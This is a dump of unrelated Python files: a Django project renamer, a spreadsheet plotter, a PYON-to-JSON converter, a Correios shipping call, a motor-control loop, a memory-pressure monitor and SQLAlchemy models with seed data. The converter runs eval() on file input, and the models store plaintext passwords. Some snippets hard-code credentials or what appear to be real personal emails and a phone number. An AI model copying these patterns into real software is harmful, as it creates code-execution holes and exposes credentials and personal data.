    # listed files.  NOTE(review): the renames are irreversible -- running
    # this twice in the same checkout will fail on the second run.
    # app_name = input('app name: ')
    app_name = sys.argv[1]
    project_name = app_name + '_project'
    # database name and user both default to the app name
    db_name = app_name
    db_user = app_name
    # db_password = input('database password: ')
    db_password = sys.argv[2]
    # rename the innermost directories first, then their parents
    os.rename('template/static/template', 'template/static/' + app_name)
    os.rename('template/templates/template', 'template/templates/' + app_name)
    os.rename('template', app_name)
    os.rename('template_project', project_name)
    # every file that contains <...> placeholders to substitute
    file_names = (
        'manage.py',
        '.gitignore',
        'gulpfile.js',
        'reset_db.sh',
        project_name + '/settings.py',
        project_name + '/urls.py',
        project_name + '/wsgi.py',
        app_name + '/apps.py',
        app_name + '/urls.py',
        app_name + '/views.py',
        app_name + '/templates/' + app_name + '/base.html',
        app_name + '/templates/' + app_name + '/home.html',
    )
    secret_key = generate_secret_key()
    replace_list = (
        ('<secret_key>', secret_key),
        ('<project_name>', project_name),
        ('<app_name>', app_name),
        ('<app_name_title>', app_name.title()),
        ('<db_name>', db_name),
        ('<db_user>', db_user),
        ('<db_password>', db_password),
    )
    for file_name in file_names:
        update_file(file_name, replace_list)
|
# -*- coding=utf-8 -*-
'''
Created on 2016年3月7日
@author: YANG
'''
import os
import xlrd
import matplotlib.pyplot as plt
"145800_ViVo_City"
if __name__=="__main__":
    # Reads an availability spreadsheet and plots, per timestamp (column 0),
    # the ratio of below-threshold samples for one site.
    # NOTE(review): column meanings inferred from use -- col 0 looks like a
    # time/date label, col 2 a site name, col 17 an availability percentage;
    # confirm against the spreadsheet.
    path = "C:\\Users\YANG\Desktop\Data" #os.path.dirname("statistic.py")
    book = xlrd.open_workbook("%s\\4.xls"%path)
    sheet = book.sheet_by_index(0)
    dic = {}        # site name -> number of rows seen
    problems = {}   # site name -> rows below the 99.5 threshold
    time = {}       # time label -> [below_threshold_count, ok_count]
    # data starts at row 8; only rows for site "130850_ITS_Centre" are kept
    for rowIndex in range(8,sheet.nrows):
        if(sheet.cell_value(rowIndex,2)!="130850_ITS_Centre"):
            continue
        pass
        # bare except implements "increment or initialize" for the counter
        try:
            dic[sheet.cell_value(rowIndex,2)] += 1
        except:
            dic[sheet.cell_value(rowIndex,2)] = 1
        if(not time.__contains__(sheet.cell_value(rowIndex,0))):
            time[sheet.cell_value(rowIndex,0)] = [0,0]
        if(not problems.__contains__(sheet.cell_value(rowIndex,2))):
            problems[sheet.cell_value(rowIndex,2)] = 0
        # "NIL" marks a missing value; 99.5 is the availability threshold
        if(sheet.cell_value(rowIndex,17)!="NIL" and float(sheet.cell_value(rowIndex,17))<99.5):
            time[sheet.cell_value(rowIndex,0)][0] += 1
            problems[sheet.cell_value(rowIndex,2)] += 1
        else:
            time[sheet.cell_value(rowIndex,0)][1] += 1
    # normalize problem counts to a per-site ratio
    for item in problems:
        problems[item] /= dic[item]
    # newest time label first; +1 in the denominator avoids division by zero
    sorted_result = sorted(time.items(), key= lambda x:x[0], reverse=True)
    for item in sorted_result:
        print(item,time[item[0]][0]/(time[item[0]][1]+1))
        pass
    index = 0
    x = []
    y = []
    # plot the last 7 labels first, then the rest -- presumably to rotate
    # the series so the most recent week leads; TODO confirm intent
    for item in sorted_result[-7:]:
        x.append(index)
        index += 1
        y.append(time[item[0]][0]/(time[item[0]][1]+time[item[0]][0]))
    for item in sorted_result[:-8]:
        x.append(index)
        index += 1
        y.append(time[item[0]][0]/(time[item[0]][1]+time[item[0]][0]))
    plt.plot(x, y, '-*')
    plt.title('')
    plt.ylabel('ratio')
    plt.xlabel('time')
    plt.show()
|
"""
Python object notation to JSON.
"""
import json
from pathlib import Path
import click
from . import cli
def do_pyon2json(ifname, ofname, pretty=True):
    """
    Convert the python object notation file to json object notation file.
    """
    with open(ifname, "r") as fin:
        # NOTE(security): eval executes arbitrary code -- only feed this
        # trusted PYON files
        obj = eval(fin.read())
    dumped = json.dumps(obj, indent=2, sort_keys=True) if pretty else json.dumps(obj)
    with open(ofname, "w") as fout:
        fout.write(dumped)
@cli.command()
@click.option("-i", "--input", type=str, default=None, help="Input file name")
@click.option("-o", "--output", type=str, default=None, help="Output file name")
@click.option("-s", "--suffix", default=".json", help="Output file suffix")
@click.option("--pretty/--no-pretty", help="Output pretty json")
@click.argument("files", type=str, nargs=-1)
def pyon2json(input, output, suffix, pretty, files):
    """
    Convert the files from PYON to JSON.
    """
    # exactly one input source: --input or positional files
    if not input and not files:
        raise click.UsageError("No input files provided")
    if input and files:
        raise click.UsageError("Both --input and files can't be specified")
    ifnames = [Path(input)] if input else [Path(f) for f in files]
    # an explicit output name only makes sense for a single input
    if output and len(ifnames) > 1:
        raise click.UsageError("--output specified with multiple input files")
    if output:
        ofnames = [output]
    else:
        # derive each output name by swapping the suffix
        ofnames = [p.with_suffix(suffix) for p in ifnames]
    for ifname, ofname in zip(ifnames, ofnames):
        do_pyon2json(ifname, ofname, pretty)
|
from pprint import pprint
from correios import calc_preco_prazo
# Query Correios (Brazilian post) shipping price/deadline for one parcel.
# NOTE(security): the contract credentials (empresa/senha) are hard-coded --
# move them to environment variables before sharing or committing this file.
response = calc_preco_prazo(
    cep_origem='70002900',      # origin CEP (zip code)
    cep_destino='04547000',     # destination CEP
    peso='1',                   # weight -- presumably kg; TODO confirm units
    altura='20',                # height, cm
    largura='20',               # width, cm
    comprimento='20',           # length, cm
    servicos=['04510', '04014'],  # Correios service codes (PAC / SEDEX)
    empresa='08082650',         # contract company code
    senha='564321',             # contract password
)
pprint(response)
|
#!/usr/bin/python
import numpy as np
import math
from roboclaw import *
# Motor speed setpoint -- units are whatever SetM1Speed/SetM2Speed expect
# (presumably encoder counts/sec; TODO confirm against the roboclaw module).
speed = 16384
print "started"
# drive both RoboClaw controllers (bus addresses 128 and 129) forever
while True:
    print "loop begin"
    SetM1Speed(128,speed)
    SetM2Speed(129,speed)
    # NOTE(review): M1 on controller 129 is never commanded -- confirm this
    # second SetM2Speed(128, ...) is not meant to be SetM1Speed(129, ...)
    SetM2Speed(128,speed)
    # time comes from 'from roboclaw import *' -- there is no explicit import
    time.sleep(1)
    # print readM1instspeed(128)
    # print readM2instspeed(128)
    # print readM2instspeed(129)
    time.sleep(1)
|
#!/usr/bin/env python3
from time import sleep, time
import os
from sys import stdout
# Optionally lock all current and future pages in RAM so this monitor is not
# itself swapped out while it measures memory pressure.
mlockall = True
if mlockall:
    from ctypes import CDLL
    # 3 == MCL_CURRENT | MCL_FUTURE (see mlockall(2))
    CDLL('libc.so.6').mlockall(3)
# PSI (pressure stall information) exists on Linux >= 4.20 with CONFIG_PSI=y
psi_path = '/proc/pressure/memory'
psi_support = os.path.exists(psi_path)
def rline1(path):
    """Return the first line of *path* without its trailing character.

    Returns None implicitly when the file is empty.
    """
    with open(path) as f:
        for first_line in f:
            return first_line[:-1]
def psi_mem_some_avg_total():
    """Return the trailing 'total=' counter from the first PSI memory line as float."""
    first_line = rline1(psi_path)
    return float(first_line.rpartition('=')[2])
# minimum interval (seconds) between recomputations of the averaged rate
avg_min_time = 1
if psi_support:
    # seed the previous (timestamp, total-counter) pair
    ta0 = time()
    a0 = psi_mem_some_avg_total()
while True:
    if psi_support:
        ta1= time()
        dt = ta1 - ta0
        if dt >= avg_min_time:
            a1 = psi_mem_some_avg_total()
            # delta of the stall-time counter over wall time; the counter is
            # in microseconds, so /10000 yields a percentage-like figure
            avg = (a1 - a0) / (ta1 - ta0) / 10000
            print('avg time:', round(dt, 1))
            print('PSI mem avg:', round(avg, 2))
            print(rline1(psi_path), '\n')
            ta0 = ta1
            a0 = a1
    # flush so output is visible when piped; poll at 10 Hz
    stdout.flush()
    sleep(0.1)
|
"""
sql_tables.py: all SQL table definitions and bootstrapping goes here
"""
import datetime
from backend_main import DB
class Sys_user_role(DB.Model):
    """
    system user role database table definition
    Stores roles for sys_user
    1 = Order Taker
    2 = Order Fulfiller
    3 = Administrator
    """
    # surrogate primary key; bootstrap order makes 1/2/3 map as documented above
    id = DB.Column(DB.Integer, primary_key=True, nullable=False)
    # human-readable role name, unique across roles
    name = DB.Column(DB.String(50), nullable=False, unique=True)
    def __init__(self, name):
        self.name = name
    def request_sys_user_role_info(self):
        """
        produces a dictionary of all relevant sys_user_role information
        """
        return {
            "id": self.id,
            "name": self.name
        }
    @staticmethod
    def bootstrap_populate(database):
        """
        database bootstrap function for Sys_user_role

        Inserts the three fixed roles; insertion order determines the ids.
        """
        database.session.add(Sys_user_role("Order Taker"))
        database.session.add(Sys_user_role("Order Fulfiller"))
        database.session.add(Sys_user_role("Administrator"))
        database.session.commit()
class Sys_user(DB.Model):
    """
    sys_user database table definition
    Stores all employee / system user information
    """
    id = DB.Column(DB.Integer, primary_key=True, nullable=False)
    name_first = DB.Column(DB.String(50), nullable=False)
    name_last = DB.Column(DB.String(50), nullable=False)
    # login name, unique per user
    sys_username = DB.Column(DB.String(50), nullable=False, unique=True)
    # Note, password is currently plain text. In the future,
    # make this a hash with a salt, make salt another field
    password = DB.Column(DB.String(255), nullable=False)
    email_google = DB.Column(DB.String(100), nullable=False, unique=True)
    email_fb = DB.Column(DB.String(100), nullable=False, unique=True)
    image_url = DB.Column(DB.String(500), nullable=False)
    phone_number = DB.Column(DB.String(10), nullable=True)
    # FK into sys_user_role (1 = taker, 2 = fulfiller, 3 = admin)
    role = DB.Column(DB.Integer, DB.ForeignKey("sys_user_role.id"), nullable=False)
    def __init__(self, first, last, username, password, google, facebook, image, phone, role):
        self.name_first = first
        self.name_last = last
        self.sys_username = username
        self.password = password
        self.email_google = google
        self.email_fb = facebook
        self.image_url = image
        self.phone_number = phone
        self.role = role
    def request_sys_user_info(self, database):
        """
        produces a dictionary of all relevant sys_user information

        The password is deliberately excluded; the role FK is expanded into
        the full role dictionary.
        """
        sys_user_role = (
            database.session.query(Sys_user_role)
            .filter(Sys_user_role.id == self.role)
            .all()
        )[0].request_sys_user_role_info()
        return {
            "id": self.id,
            "name_first": self.name_first,
            "name_last": self.name_last,
            "sys_username": self.sys_username,
            "email_google": self.email_google,
            "email_fb": self.email_fb,
            "image_url": self.image_url,
            "phone_number": self.phone_number,
            "sys_user_role": sys_user_role,
        }
    @staticmethod
    def bootstrap_populate(database):
        """
        database bootstrap function for sys_user

        Inserts one demo user per role plus the team members' accounts.
        """
        database.session.add(
            Sys_user(
                "Order",
                "Taker",
                "order_taker",
                "ot1234",
                "order_taker@gmail.com",
                "order_taker@other.com",
                "https://images.squarespace-cdn.com/content/v1/55ad5011e4b026cf25" +
                "25000a/1441740484174-PTHHQBWISMSJUC9OS1RX/ke17ZwdGBToddI8pDm4" +
                "8kP06O0_IHyRXSOOiqwgWaApZw-zPPgdn4jUwVcJE1ZvWEtT5uBSRWt4vQZAg" +
                "TJucoTqqXjS3CfNDSuuf31e0tVEHLRkg2cosQUGLeQ33UzXdgIxPDaVwE3LlE" +
                "pL74qP4JVW4jCyXLPvvdR287iymYt8/the-letter-t.jpg",
                "1234567890",
                1,
            )
        )
        database.session.add(
            Sys_user(
                "Order",
                "Fulfiller",
                "order_fulfiller",
                "of1234",
                "order_fulfiller@gmail.com",
                "order_fulfiller@other.com",
                "https://i.redd.it/o8rz4s0lxp021.png",
                "1234567890",
                2,
            )
        )
        database.session.add(
            Sys_user(
                "Administrator",
                "",
                "admin",
                "root",
                "administrator@gmail.com",
                "administrator@other.com",
                "https://lh3.googleusercontent.com/proxy/RNhuhNzPCOufEUuiXAZ6R49T" +
                "4H1qAjaXoVhXv7dZ4SDkTGXzkpFm8AsNAOxgxHgsRJGWuVa_OAM2l7iZ7YJDM" +
                "rrOe2AIi1U",
                "1234567890",
                3,
            )
        )
        database.session.add(
            Sys_user(
                "Denisse",
                "Mendoza",
                "denisse",
                "dm1234",
                "dm464@njit.edu",
                "idislexiaheart@aol.com",
                "https://i0.wp.com/thevitpro.com/wp-content/uploads/2019/07/Lette" +
                "r-D.png?fit=551%2C640&ssl=1",
                "1234567890",
                1,
            )
        )
        database.session.add(
            Sys_user(
                "Tylor",
                "Autore",
                "tylor",
                "ta1234",
                "tma26@njit.edu",
                "hellfrost@embarqmail.com",
                "https://pioneerinstitute.org/wp-content/uploads/MBTA-T-sign-e143" +
                "8701323593.png",
                "9739199865",
                2,
            )
        )
        database.session.add(
            Sys_user(
                "Abdul-Quddus",
                "Adeniji",
                "abdul",
                "aq1234",
                "aqadeniji@gmail.com",
                "abdul83@ymail.com",
                "https://lh3.googleusercontent.com/proxy/DuGp1GYoFa1QAqNutn5Ga0eWg" +
                "B2BlYJaHU5QeQpNJtSXIPOmdmBms6yPWP7F7MpUxd8kNtAqYtqMub-byZ-LJ-R" +
                "quvoun_xfE3eobkfctl0v",
                "1234567890",
                2,
            )
        )
        database.session.add(
            Sys_user(
                "Zoraiz",
                "Naeem",
                "zoraiz",
                "zn1234",
                "zoraiznaeem9@gmail.com",
                "zoraiznaeem9@gmail.com",
                "https://static6.depositphotos.com/1001599/647/i/600/depositphoto" +
                "s_6477200-stock-photo-fire-letters-a-z.jpg",
                "1234567890",
                1,
            )
        )
        database.session.commit()
class Zone(DB.Model):
    """
    zone database table definition
    Zones are assigned to companyies and shops
    (linked via the Shop_zone and Company_zone association tables)
    """
    id = DB.Column(DB.Integer, primary_key=True, nullable=False)
    # zone display name, unique
    name = DB.Column(DB.String(100), nullable=False, unique=True)
    def __init__(self, name):
        self.name = name
    def request_zone_info(self):
        """
        produces a dictionary of all relevant zone information
        """
        return {
            "id": self.id,
            "name": self.name
        }
    @staticmethod
    def bootstrap_populate(database):
        """
        database bootstrap function for zone
        """
        database.session.add(Zone("Temp Zone 1"))
        database.session.add(Zone("Temp Zone 2"))
        database.session.add(Zone("Temp Zone 3"))
        database.session.add(Zone("Temp Zone 4"))
        database.session.commit()
class Shop_category(DB.Model):
    """
    shop category database table definition
    (referenced by Shop.category; optional on a shop)
    """
    id = DB.Column(DB.Integer, primary_key=True, nullable=False)
    # category label; note this column shadows the builtin name 'type'
    type = DB.Column(DB.String(100), nullable=False, unique=True)
    def __init__(self, sc_type):
        self.type = sc_type
    def request_category_info(self):
        """
        produces a dictionary of all relevant shop information
        """
        return {
            "id": self.id,
            "type": self.type
        }
    @staticmethod
    def bootstrap_populate(database):
        """
        database bootstrap function for Shop_category
        """
        database.session.add(Shop_category("Temp Category 1"))
        database.session.add(Shop_category("Temp Category 2"))
        database.session.commit()
class Shop(DB.Model):
    """
    shop database table definition
    A customer-facing shop with an optional category and an address.
    """
    id = DB.Column(DB.Integer, primary_key=True, nullable=False)
    name = DB.Column(DB.String(100), nullable=False)
    email = DB.Column(DB.String(100), nullable=True)
    image_url = DB.Column(DB.String(500), nullable=False)
    phone_number = DB.Column(DB.String(10), nullable=True)
    # optional FK into shop_category
    category = DB.Column(DB.Integer, DB.ForeignKey("shop_category.id"), nullable=True)
    # address fields; zip_4 holds a "12345-1234" style ZIP+4 string
    street = DB.Column(DB.String(255), nullable=False)
    city = DB.Column(DB.String(255), nullable=False)
    providence = DB.Column(DB.String(255), nullable=False)
    zip_4 = DB.Column(DB.String(10), nullable=False)
    def __init__(self, name, email, image, phone, category, street, city, providence, zipcode):
        self.name = name
        self.email = email
        self.image_url = image
        self.phone_number = phone
        self.category = category
        self.street = street
        self.city = city
        self.providence = providence
        self.zip_4 = zipcode
    def request_shop_info(self, database):
        """
        produces a dictionary of all relevant shop information

        Expands the optional category FK into a full dictionary (or None)
        and collects the shop's zones from the Shop_zone association table.
        """
        if self.category is not None:
            shop_category_info = (
                database.session.query(Shop_category)
                .filter(Shop_category.id == self.category)
                .all()
            )[0].request_category_info()
        else:
            shop_category_info = None
        shop_zone_query = (
            database.session.query(Shop_zone).filter(Shop_zone.shop == self.id).all()
        )
        zones = []
        for zone in shop_zone_query:
            zones.append(zone.request_zone_info(database))
        return {
            "id": self.id,
            "name": self.name,
            "email": self.email,
            "image_url": self.image_url,
            "phone_number": self.phone_number,
            "category": shop_category_info,
            "zones": zones,
            "street": self.street,
            "city": self.city,
            "providence": self.providence,
            "zip_4": self.zip_4,
        }
    @staticmethod
    def bootstrap_populate(database):
        """
        database bootstrap function for shop
        """
        database.session.add(
            Shop(
                "Temp Store 1",
                None,
                "https://yt3.ggpht.com/ytc/AAUvwnjLNdkBK-GXpJJQ8K9Nku_gHwS5f" +
                "WUKkq0BEoPgTA=s900-c-k-c0x00ffffff-no-rj",
                "1234567890",
                None,
                "Street 1",
                "City 1",
                "Providence 1",
                "12345-1234",
            )
        )
        database.session.add(
            Shop(
                "Temp Store 2",
                "ts2@store.com",
                "https://www.clker.com/cliparts/V/H/K/p/p/u/number-2-black-" +
                "hi.png",
                "1234567890",
                1,
                "Street 2",
                "City 2",
                "Providence 2",
                "12345-1234",
            )
        )
        database.session.add(
            Shop(
                "Temp Store 3",
                None,
                "https://blognumbers.files.wordpress.com/2010/09/3.jpg",
                "1234567890",
                2,
                "Street 3",
                "City 3",
                "Providence 3",
                "12345-1234",
            )
        )
        database.session.commit()
class Shop_zone(DB.Model):
    """
    shop_zone database table definition
    Many-to-many association between shops and zones; the composite
    (shop, zone) pair is the primary key.
    """
    shop = DB.Column(
        DB.Integer, DB.ForeignKey("shop.id"), primary_key=True, nullable=False
    )
    zone = DB.Column(
        DB.Integer, DB.ForeignKey("zone.id"), primary_key=True, nullable=False
    )
    def __init__(self, shop, zone):
        self.shop = shop
        self.zone = zone
    def request_zone_info(self, database):
        """
        produces a dictionary of all relevant zone information
        (resolves the zone FK to its name)
        """
        zone_name = (database.session.query(Zone).filter(Zone.id == self.zone).all())[
            0
        ].name
        return {
            "id": self.zone,
            "name": zone_name
        }
    @staticmethod
    def bootstrap_populate(database):
        """
        database bootstrap function for shop_zone
        """
        database.session.add(Shop_zone(1, 1))
        database.session.add(Shop_zone(1, 4))
        database.session.add(Shop_zone(2, 3))
        database.session.add(Shop_zone(3, 1))
        database.session.add(Shop_zone(3, 2))
        database.session.add(Shop_zone(3, 3))
        database.session.add(Shop_zone(3, 4))
        database.session.commit()
class Company(DB.Model):
    """
    company database table definition
    A supplier whose products (Company_product) shops can order.
    """
    id = DB.Column(DB.Integer, primary_key=True, nullable=False)
    name = DB.Column(DB.String(100), nullable=False, unique=True)
    image_url = DB.Column(DB.String(500), nullable=False)
    def __init__(self, name, image):
        self.name = name
        self.image_url = image
    def request_company_info(self, database):
        """
        produces a dictionary of all relevant company_product information
        (zones are collected from the Company_zone association table)
        """
        company_zone_query = (
            database.session.query(Company_zone)
            .filter(Company_zone.company == self.id)
            .all()
        )
        zones = []
        for zone in company_zone_query:
            zones.append(zone.request_zone_info(database))
        return {
            "id": self.id,
            "name": self.name,
            "image_url": self.image_url,
            "zones": zones
        }
    @staticmethod
    def bootstrap_populate(database):
        """
        database bootstrap function for company

        Bug fix: the second URL contained the escape sequence "\\2", which
        Python interprets as the octal escape chr(2) (a control character),
        corrupting the URL; it is now the literal digit 2.
        """
        database.session.add(
            Company(
                "Company 1",
                "https://upload.wikimedia.org/wikipedia/commons/thum" +
                "b/3/3f/NYCS-bull-trans-1.svg/1024px-NYCS-bull-tr" +
                "ans-1.svg.png"
            )
        )
        database.session.add(
            Company(
                "Company 2",
                "https://upload.wikimedia.org/wikipedia/commons/thum" +
                "b/6/61/NYCS-bull-trans-2.svg/1200px-NYCS-bull-tr" +
                "ans-2.svg.png"
            )
        )
        database.session.commit()
class Company_zone(DB.Model):
    """
    company_zone database table definition
    Many-to-many association between companies and zones; the composite
    (company, zone) pair is the primary key.
    """
    company = DB.Column(
        DB.Integer, DB.ForeignKey("company.id"), primary_key=True, nullable=False
    )
    zone = DB.Column(
        DB.Integer, DB.ForeignKey("zone.id"), primary_key=True, nullable=False
    )
    def __init__(self, company, zone):
        self.company = company
        self.zone = zone
    def request_zone_info(self, database):
        """
        produces a dictionary of all relevant zone information
        (resolves the zone FK to its name)
        """
        zone_name = (database.session.query(Zone).filter(Zone.id == self.zone).all())[
            0
        ].name
        return {
            "id": self.zone,
            "name": zone_name
        }
    @staticmethod
    def bootstrap_populate(database):
        """
        database bootstrap function for company_zone
        """
        database.session.add(Company_zone(1, 2))
        database.session.add(Company_zone(1, 3))
        database.session.add(Company_zone(2, 1))
        database.session.add(Company_zone(2, 4))
        database.session.commit()
class Company_product(DB.Model):
    """
    company_product database table definition
    A product offered by a company, with buy/sell prices and stock level.
    """
    id = DB.Column(DB.Integer, primary_key=True, nullable=False)
    company = DB.Column(DB.Integer, DB.ForeignKey("company.id"), nullable=False)
    name = DB.Column(DB.String(100), nullable=False)
    # prices are per units_per_price units (see price_sell_per_unit below)
    price_buy = DB.Column(DB.Numeric(10, 2), nullable=False)
    price_sell = DB.Column(DB.Numeric(10, 2), nullable=False)
    units_per_price = DB.Column(DB.Integer, nullable=False)
    stock = DB.Column(DB.Integer, nullable=False)
    image_url = DB.Column(DB.String(500), nullable=False)
    description = DB.Column(DB.String(255), nullable=True)
    def __init__(self, company, name, buy, sell, unit, stock, image, description):
        self.company = company
        self.name = name
        self.price_buy = buy
        self.price_sell = sell
        self.units_per_price = unit
        self.stock = stock
        self.image_url = image
        self.description = description
    def request_company_product_info(self, database):
        """
        produces a dictionary of all relevant company_product information

        Numeric columns are converted to float for JSON-friendliness, and
        the company FK is expanded into a full dictionary.
        """
        company = (
            database.session.query(Company).filter(Company.id == self.company).all()
        )[0].request_company_info(database)
        return {
            "id": self.id,
            "company": company,
            "name": self.name,
            "price_buy": float(self.price_buy),
            "price_sell": float(self.price_sell),
            "units_per_price": self.units_per_price,
            "price_sell_per_unit": float(self.price_sell / self.units_per_price),
            "stock": self.stock,
            "image_url": self.image_url,
            "description": self.description
        }
    @staticmethod
    def bootstrap_populate(database):
        """
        database bootstrap function for company_product
        """
        database.session.add(
            Company_product(
                1,
                "C1 Item 1",
                1.00,
                2.00,
                1,
                10,
                "https://www.kindpng.com/picc/m/11-112771_1-number-" +
                "circle-desgin-png-1-2-3.png",
                None
            )
        )
        database.session.add(
            Company_product(
                1,
                "C1 Item 2",
                2.00,
                4.00,
                2,
                12,
                "https://cdn.picpng.com/2/photo-2-35361.png",
                "Item 2!"
            )
        )
        database.session.add(
            Company_product(
                1,
                "C1 Item 3",
                300.00,
                600.00,
                30,
                33,
                "https://blognumbers.files.wordpress.com/2010/09/3.jpg",
                "Big Item 3"
            )
        )
        database.session.add(
            Company_product(
                1,
                "C1 Item 4",
                44.00,
                88.00,
                4,
                100,
                "https://blognumbers.files.wordpress.com/2010/09/4.jpg",
                None
            )
        )
        database.session.add(
            Company_product(
                2,
                "C2 Item 1",
                100.00,
                200.00,
                1,
                22,
                "https://www.kindpng.com/picc/m/11-112771_1-number-" +
                "circle-desgin-png-1-2-3.png",
                "Big Item"
            )
        )
        database.session.add(
            Company_product(
                2,
                "C2 Item 2",
                0.01,
                0.02,
                1,
                33,
                "https://cdn.picpng.com/2/photo-2-35361.png",
                "Small Item"
            )
        )
        database.session.add(
            Company_product(
                2,
                "C2 Item 3",
                10000.00,
                20000.00,
                1,
                5,
                "https://blognumbers.files.wordpress.com/2010/09/3.jpg",
                "Huge Item"
            )
        )
        database.session.add(
            Company_product(
                2,
                "C2 Item 4",
                4.44,
                8.88,
                1,
                400,
                "https://blognumbers.files.wordpress.com/2010/09/4.jpg",
                None
            )
        )
        database.session.commit()
class Shop_order(DB.Model):
    """
    shop_order database table definition
    One order placed by a shop; line items live in shop_order_item.
    """
    id = DB.Column(DB.Integer, primary_key=True, nullable=False)
    shop = DB.Column(DB.Integer, DB.ForeignKey("shop.id"), nullable=False)
    price_due = DB.Column(DB.Numeric(10, 2), nullable=False)
    # whether the amount due has been paid
    price_paid = DB.Column(DB.Boolean(), nullable=False)
    memo = DB.Column(DB.String(500), nullable=False)
    # timezone-aware timestamps; date_delivered stays NULL until delivery
    date_ordered = DB.Column(DB.DateTime(True), nullable=False)
    date_delivered_projected = DB.Column(DB.DateTime(True), nullable=False)
    date_delivered = DB.Column(DB.DateTime(True), nullable=True)
    # both FKs reference sys_user; fulfiller is assigned later, hence nullable
    order_taker = DB.Column(DB.Integer, DB.ForeignKey("sys_user.id"), nullable=False)
    order_fulfiller = DB.Column(DB.Integer, DB.ForeignKey("sys_user.id"), nullable=True)
    completed = DB.Column(DB.Boolean(), nullable=False)
    def __init__(self, shop, due, paid, memo, ordered, projected,
                 delivered, taker, fulfiller, completed):
        self.shop = shop
        self.price_due = due
        self.price_paid = paid
        self.memo = memo
        self.date_ordered = ordered
        self.date_delivered_projected = projected
        self.date_delivered = delivered
        self.order_taker = taker
        self.order_fulfiller = fulfiller
        self.completed = completed
    def request_shop_order(self, database):
        """
        produces a dictionary of all relevant shop_order information

        Expands the shop, taker, and (optional) fulfiller FKs into full
        dictionaries and attaches the order's line items.
        """
        shop_entry = (database.session.query(Shop).filter(Shop.id == self.shop).all())[
            0
        ]
        order_taker = (
            database.session.query(Sys_user)
            .filter(Sys_user.id == self.order_taker)
            .all()
        )[0].request_sys_user_info(database)
        if self.order_fulfiller is not None:
            order_fulfiller = (
                database.session.query(Sys_user)
                .filter(Sys_user.id == self.order_fulfiller)
                .all()
            )[0].request_sys_user_info(database)
        else:
            order_fulfiller = None
        shop_order_items_query = (
            database.session.query(Shop_order_item)
            .filter(Shop_order_item.shop_order == self.id)
            .all()
        )
        shop_order_items = []
        for entry in shop_order_items_query:
            shop_order_items.append(entry.request_shop_order_item_info(database))
        # NOTE(review): the ordered/projected dates are stringified but
        # date_delivered is returned raw -- confirm callers expect that
        return {
            "id": self.id,
            "shop": shop_entry.request_shop_info(database),
            "price_due": float(self.price_due),
            "price_paid": self.price_paid,
            "memo": self.memo,
            "date_ordered": str(self.date_ordered),
            "date_delivered_projected": str(self.date_delivered_projected),
            "date_delivered": self.date_delivered,
            "order_taker": order_taker,
            "order_fulfiller": order_fulfiller,
            "completed": self.completed,
            "shop_order_items": shop_order_items,
        }
    @staticmethod
    def bootstrap_populate(database):
        """
        database bootstrap function for shop_order
        """
        current_time_utc = datetime.datetime.now(datetime.timezone.utc)
        # one week ahead for projected delivery date
        week_forward = current_time_utc + datetime.timedelta(days=7)
        # order placed and paid
        database.session.add(
            Shop_order(
                1,
                40614.00,
                True,
                "test 1",
                current_time_utc,
                week_forward,
                None,
                1,
                None,
                False
            )
        )
        # order placed and not paid
        database.session.add(
            Shop_order(
                2,
                7928.00,
                False,
                "test 2",
                current_time_utc,
                week_forward,
                None,
                1,
                None,
                False
            )
        )
        # order placed, paid and delivered
        database.session.add(
            Shop_order(
                3,
                400400.00,
                True,
                "",
                current_time_utc,
                week_forward,
                week_forward,
                1,
                2,
                True,
            )
        )
        database.session.commit()
class Shop_order_item(DB.Model):
    """
    shop_order_item database table definition
    One line item of a shop order; the composite (shop_order,
    company_product) pair is the primary key.
    """
    shop_order = DB.Column(
        DB.Integer, DB.ForeignKey("shop_order.id"), primary_key=True, nullable=False
    )
    company_product = DB.Column(
        DB.Integer,
        DB.ForeignKey("company_product.id"),
        primary_key=True,
        nullable=False,
    )
    quantity_units = DB.Column(DB.Integer, nullable=False)
    def __init__(self, order, company, units):
        self.shop_order = order
        self.company_product = company
        self.quantity_units = units
    def request_shop_order_item_info(self, database):
        """
        produces a dictionary of all relevant shop_order_item information

        Bug fix: removed the stray chained assignment
        ``company_product = shop_order_items_query = ...`` which bound an
        unrelated, misleading dead name.
        """
        company_product = (
            database.session.query(Company_product)
            .filter(Company_product.id == self.company_product)
            .all()[0]
            .request_company_product_info(database)
        )
        return {
            "company_product": company_product,
            "quantity_units": self.quantity_units,
        }
    @staticmethod
    def bootstrap_populate(database):
        """
        database bootstrap function for shop_order_items
        """
        database.session.add(Shop_order_item(1, 2, 6))
        database.session.add(Shop_order_item(1, 7, 2))
        database.session.add(Shop_order_item(1, 6, 100))
        database.session.add(Shop_order_item(1, 5, 3))
        database.session.add(Shop_order_item(2, 1, 200))
        database.session.add(Shop_order_item(2, 4, 100))
        database.session.add(Shop_order_item(2, 8, 600))
        database.session.add(Shop_order_item(3, 7, 20))
        database.session.add(Shop_order_item(3, 3, 10))
        database.session.add(Shop_order_item(3, 6, 10000))
        database.session.commit()
class Order_taker_goal(DB.Model):
    """
    order_taker_goal database table definition

    Monthly sales goal for an order taker, keyed by the composite
    (order_taker, month, year).
    """
    order_taker = DB.Column(
        DB.Integer, DB.ForeignKey("sys_user.id"), primary_key=True, nullable=False
    )
    month = DB.Column(DB.Integer, primary_key=True, nullable=False)
    year = DB.Column(DB.Integer, primary_key=True, nullable=False)
    goal_value = DB.Column(DB.Numeric(10, 2), nullable=False)

    def __init__(self, taker, month, year, value):
        self.order_taker = taker
        self.month = month
        self.year = year
        self.goal_value = value

    def request_order_taker_goal_info(self):
        """
        produces a dictionary of all relevant order_taker_goal information
        """
        info = {
            "order_taker": self.order_taker,
            "month": self.month,
            "year": self.year,
            "goal_value": self.goal_value,
        }
        return info

    @staticmethod
    def bootstrap_populate(database):
        """
        database bootstrap function for order_taker_goal
        """
        # (taker, month, year, goal) — two consecutive months per taker
        goal_rows = (
            (1, 11, 2020, 20000.00),
            (1, 12, 2020, 15000.00),
            (4, 11, 2020, 10000.00),
            (4, 12, 2020, 11000.00),
            (7, 11, 2020, 12000.00),
            (7, 12, 2020, 13000.00),
        )
        for row in goal_rows:
            database.session.add(Order_taker_goal(*row))
        database.session.commit()
def database_bootstrap(database):
    """
    this function populates all tables with mock testing data
    """
    # order matters: parent tables must be populated before the tables
    # whose rows reference them via foreign keys
    bootstrap_order = (
        Sys_user_role,
        Sys_user,
        Zone,
        Shop_category,
        Shop,
        Shop_zone,
        Company,
        Company_zone,
        Company_product,
        Shop_order,
        Shop_order_item,
        Order_taker_goal,
    )
    for table in bootstrap_order:
        table.bootstrap_populate(database)
    database.session.close()
|
import os
import sys
import subprocess
import shutil
